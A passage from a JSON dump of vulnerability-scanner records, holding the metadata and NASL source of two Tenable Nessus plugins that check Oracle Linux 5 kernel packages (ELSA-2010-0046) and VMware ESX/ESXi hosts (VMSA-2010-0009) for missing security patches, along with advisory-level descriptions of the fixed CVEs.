Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2018-07-18T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-PAE", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-xen-devel", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-PAE-devel", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-xen"], "id": "ORACLELINUX_ELSA-2010-0046.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67988", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0046 and \n# Oracle Linux Security Advisory ELSA-2010-0046 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67988);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_bugtraq_id(36576, 37019, 37068, 37069, 37339, 37806);\n script_xref(name:\"RHSA\", value:\"2010:0046\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2010-0046)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0046 :\n\nUpdated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* an array index error was found in the gdth driver. A local user\ncould send a specially crafted IOCTL request that would cause a denial\nof service or, possibly, privilege escalation. (CVE-2009-3080,\nImportant)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer,\npossibly leading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to\nleverage a use-after-free of locked, asynchronous file descriptors to\ncause a denial of service or privilege escalation. (CVE-2009-4141,\nImportant)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an\nattacker was able to cause a large enough number of collisions in the\nrouting hash table (via specially crafted packets) for the emergency\nroute flush to trigger, a deadlock could occur. Secondly, if the\nkernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing,\ncould use this flaw to append data to the dumped core file. This issue\nonly affects systems that have '/proc/sys/fs/suid_dumpable' set to 2\n(the default value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With\nsuid_dumpable set to 2, the core file will not be recorded if the file\nalready exists. For example, core files will not be overwritten on\nsubsequent crashes of processes whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910,\nModerate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo\nfiles, '/sys/class/scsi_host/[a qla2xxx host]/vport_create' and\n'vport_delete'. These two files were world-writable by default,\nallowing a local user to change SCSI host attributes. This flaw only\naffects systems using the qla2xxx driver and NPIV capable hardware.\n(CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The\n'dbg_lvl' and 'poll_mode_io' files on the sysfs file system ('/sys/')\nhad world-writable permissions. This could allow local, unprivileged\nusers to change the behavior of the driver. (CVE-2009-3889,\nCVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci\ndriver used for OHCI compliant IEEE 1394 controllers. A local,\nunprivileged user with access to /dev/fw* files could issue certain\nIOCTL calls, causing a denial of service or privilege escalation. The\nFireWire modules are blacklisted by default, and if enabled, only root\nhas access to the files noted above by default. (CVE-2009-4138,\nModerate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in\nthe HFS file system implementation. This could lead to a denial of\nservice if a user browsed a specially crafted HFS file system, for\nexample, by running 'ls'. (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update\n/ index.html\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-January/001335.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-164.11.1.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-164.11.1.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:50:59", "references": ["http://lists.vmware.com/pipermail/security-announce/2010/000099.html"], "pluginID": "46765", "description": "a. Service Console update for COS kernel\n\n Updated COS package 'kernel' addresses the security issues that are fixed through versions 2.6.18-164.11.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228, CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues fixed in kernel 2.6.18-164.6.1\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621, CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537, CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020, CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to the security issues fixed in kernel 2.6.18-164.11.1.\n\nb. ESXi userworld update for ntp\n\n The Network Time Protocol (NTP) is used to synchronize the time of a computer client or server to another server or reference time source.\n\n A vulnerability in ntpd could allow a remote attacker to cause a denial of service (CPU and bandwidth consumption) by using MODE_PRIVATE to send a spoofed (1) request or (2) response packet that triggers a continuous exchange of MODE_PRIVATE error responses between two NTP daemons.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-3563 to this issue.\n\nc. Service Console package openssl updated to 0.9.8e-12.el5_4.1\n\n OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with full-strength cryptography world-wide.\n\n A memory leak in the zlib could allow a remote attacker to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-4355 to this issue.\n\n A vulnerability was discovered which may allow remote attackers to spoof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-2409 to this issue.\n\n This update also includes security fixes that were first addressed in version openssl-0.9.8e-12.el5.i386.rpm.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378, CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues.\n\nd. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to 2.2.14-15.\n\n Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\n Multiple integer underflows in the AES and RC4 functionality in the crypto library could allow remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code by providing ciphertext with a length that is too short to be valid.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-4212 to this issue.\n\n The service console package for pam_krb5 is updated to version pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In some non-default configurations (specifically, where pam_krb5 would be the first module to prompt for a password), a remote attacker could use this flaw to recognize valid usernames, which would aid a dictionary-based password guess attack.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-1384 to this issue.\n\ne. Service Console package bind updated to 9.3.6-4.P1.el5_4.2\n\n BIND (Berkeley Internet Name Daemon) is by far the most widely used Domain Name System (DNS) software on the Internet.\n\n A vulnerability was discovered which could allow remote attacker to add the Authenticated Data (AD) flag to a forged NXDOMAIN response for an existing domain.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0097 to this issue.\n\n A vulnerability was discovered which could allow remote attackers to conduct DNS cache poisoning attacks by receiving a recursive client query and sending a response that contains CNAME or DNAME records, which do not have the intended validation before caching.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0290 to this issue.\n\n A vulnerability was found in the way that bind handles out-of- bailiwick data accompanying a secure response without re-fetching from the original source, which could allow remote attackers to have an unspecified impact via a crafted response.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0382 to this issue.\n\n NOTE: ESX does not use the BIND name service daemon by default.\n\nf. Service Console package gcc updated to 3.2.3-60\n\n The GNU Compiler Collection includes front ends for C, C++, Objective-C, Fortran, Java, and Ada, as well as libraries for these languages\n\n GNU Libtool's ltdl.c attempts to open .la library files in the current working directory. This could allow a local user to gain privileges via a Trojan horse file. The GNU C Compiler collection (gcc) provided in ESX contains a statically linked version of the vulnerable code, and is being replaced.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-3736 to this issue.\n\ng. Service Console package gzip update to 1.3.3-15.rhel3\n\n gzip is a software application used for file compression\n\n An integer underflow in gzip's unlzw function on 64-bit platforms may allow a remote attacker to trigger an array index error leading to a denial of service (application crash) or possibly execute arbitrary code via a crafted LZW compressed file.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0001 to this issue.\n\nh. Service Console package sudo updated to 1.6.9p17-6.el5_4\n\n Sudo (su 'do') allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\n\n When a pseudo-command is enabled, sudo permits a match between the name of the pseudo-command and the name of an executable file in an arbitrary directory, which allows local users to gain privileges via a crafted executable file.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0426 to this issue.\n\n When the runas_default option is used, sudo does not properly set group memberships, which allows local users to gain privileges via a sudo command.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0427 to this issue.", "edition": 6, "reporter": "Tenable", "published": "2010-06-01T00:00:00", "title": "VMSA-2010-0009 : ESXi ntp and ESX Service Console third-party updates", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "VMware ESX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3613", "CVE-2009-3556", "CVE-2009-1386", "CVE-2009-4537", "CVE-2009-1379", "CVE-2009-3939", "CVE-2009-1377", "CVE-2009-4272", "CVE-2009-3621", "CVE-2009-3726", "CVE-2009-2910", "CVE-2009-4355", "CVE-2009-4141", "CVE-2009-2409", "CVE-2009-3563", "CVE-2009-1387", "CVE-2010-0001", "CVE-2007-4567", "CVE-2010-0382", "CVE-2009-1378", "CVE-2010-0290", "CVE-2009-0590", "CVE-2009-3080", "CVE-2009-4538", "CVE-2009-3547", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3620", "CVE-2010-0426", "CVE-2009-4536", "CVE-2010-0427", "CVE-2009-2908", "CVE-2009-1384", "CVE-2009-3228", "CVE-2009-3889", "CVE-2010-0097", "CVE-2009-4212", "CVE-2009-4021", "CVE-2009-3286", "CVE-2009-3612", "CVE-2009-3736", "CVE-2009-4138", "CVE-2009-2695"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:3.5", "cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esxi:4.0"], "id": "VMWARE_VMSA-2010-0009.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46765", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2010-0009. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46765);\n script_version(\"1.43\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2007-4567\", \"CVE-2009-0590\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1384\", \"CVE-2009-1386\", \"CVE-2009-1387\", \"CVE-2009-2409\", \"CVE-2009-2695\", \"CVE-2009-2908\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3228\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3556\", \"CVE-2009-3563\", \"CVE-2009-3612\", \"CVE-2009-3613\", \"CVE-2009-3620\", \"CVE-2009-3621\", \"CVE-2009-3726\", \"CVE-2009-3736\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4212\", \"CVE-2009-4272\", \"CVE-2009-4355\", \"CVE-2009-4536\", \"CVE-2009-4537\", \"CVE-2009-4538\", \"CVE-2010-0001\", \"CVE-2010-0097\", \"CVE-2010-0290\", \"CVE-2010-0382\", \"CVE-2010-0426\", \"CVE-2010-0427\");\n script_bugtraq_id(31692, 34256, 35001, 35112, 35138, 35174, 35417, 36304, 36472, 36576, 36639, 36706, 36723, 36824, 36827, 36901, 36936, 37019, 37068, 37069, 37118, 37128, 37255, 37339, 37519, 37521, 37523, 37749, 37806, 37865, 37876, 37886, 38432);\n script_xref(name:\"VMSA\", value:\"2010-0009\");\n\n script_name(english:\"VMSA-2010-0009 : ESXi ntp and ESX Service Console third-party updates\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. Service Console update for COS kernel\n\n Updated COS package 'kernel' addresses the security issues that are\n fixed through versions 2.6.18-164.11.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,\n CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues\n fixed in kernel 2.6.18-164.6.1\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,\n CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,\n CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,\n CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\n CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to\n the security issues fixed in kernel 2.6.18-164.11.1.\n\nb. ESXi userworld update for ntp\n\n The Network Time Protocol (NTP) is used to synchronize the time of\n a computer client or server to another server or reference time\n source.\n\n A vulnerability in ntpd could allow a remote attacker to cause a\n denial of service (CPU and bandwidth consumption) by using\n MODE_PRIVATE to send a spoofed (1) request or (2) response packet\n that triggers a continuous exchange of MODE_PRIVATE error responses\n between two NTP daemons.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-3563 to this issue.\n\nc. Service Console package openssl updated to 0.9.8e-12.el5_4.1\n\n OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with\n full-strength cryptography world-wide.\n\n A memory leak in the zlib could allow a remote attacker to cause a\n denial of service (memory consumption) via vectors that trigger\n incorrect calls to the CRYPTO_cleanup_all_ex_data function.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-4355 to this issue.\n\n A vulnerability was discovered which may allow remote attackers to\n spoof certificates by using MD2 design flaws to generate a hash\n collision in less than brute-force time. NOTE: the scope of this\n issue is currently limited because the amount of computation\n required is still large.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-2409 to this issue.\n\n This update also includes security fixes that were first addressed\n in version openssl-0.9.8e-12.el5.i386.rpm.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,\n CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues.\n\nd. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to\n 2.2.14-15.\n\n Kerberos is a network authentication protocol. It is designed to\n provide strong authentication for client/server applications by\n using secret-key cryptography.\n\n Multiple integer underflows in the AES and RC4 functionality in the\n crypto library could allow remote attackers to cause a denial of\n service (daemon crash) or possibly execute arbitrary code by\n providing ciphertext with a length that is too short to be valid.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-4212 to this issue.\n\n The service console package for pam_krb5 is updated to version\n pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In\n some non-default configurations (specifically, where pam_krb5 would\n be the first module to prompt for a password), a remote attacker\n could use this flaw to recognize valid usernames, which would aid a\n dictionary-based password guess attack.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-1384 to this issue.\n\ne. Service Console package bind updated to 9.3.6-4.P1.el5_4.2\n\n BIND (Berkeley Internet Name Daemon) is by far the most widely used\n Domain Name System (DNS) software on the Internet.\n\n A vulnerability was discovered which could allow remote attacker to\n add the Authenticated Data (AD) flag to a forged NXDOMAIN response\n for an existing domain.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0097 to this issue.\n\n A vulnerability was discovered which could allow remote attackers\n to conduct DNS cache poisoning attacks by receiving a recursive\n client query and sending a response that contains CNAME or DNAME\n records, which do not have the intended validation before caching.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0290 to this issue.\n\n A vulnerability was found in the way that bind handles out-of-\n bailiwick data accompanying a secure response without re-fetching\n from the original source, which could allow remote attackers to\n have an unspecified impact via a crafted response.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0382 to this issue.\n\n NOTE: ESX does not use the BIND name service daemon by default.\n\nf. Service Console package gcc updated to 3.2.3-60\n\n The GNU Compiler Collection includes front ends for C, C++,\n Objective-C, Fortran, Java, and Ada, as well as libraries for these\n languages\n\n GNU Libtool's ltdl.c attempts to open .la library files in the\n current working directory. This could allow a local user to gain\n privileges via a Trojan horse file. The GNU C Compiler collection\n (gcc) provided in ESX contains a statically linked version of the\n vulnerable code, and is being replaced.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-3736 to this issue.\n\ng. Service Console package gzip update to 1.3.3-15.rhel3\n\n gzip is a software application used for file compression\n\n An integer underflow in gzip's unlzw function on 64-bit platforms\n may allow a remote attacker to trigger an array index error\n leading to a denial of service (application crash) or possibly\n execute arbitrary code via a crafted LZW compressed file.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0001 to this issue.\n\nh. Service Console package sudo updated to 1.6.9p17-6.el5_4\n\n Sudo (su 'do') allows a system administrator to delegate authority\n to give certain users (or groups of users) the ability to run some\n (or all) commands as root or another user while providing an audit\n trail of the commands and their arguments.\n\n When a pseudo-command is enabled, sudo permits a match between the\n name of the pseudo-command and the name of an executable file in an\n arbitrary directory, which allows local users to gain privileges\n via a crafted executable file.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0426 to this issue.\n\n When the runas_default option is used, sudo does not properly set\n group memberships, which allows local users to gain privileges via\n a sudo command.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0427 to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2010/000099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119, 189, 200, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) 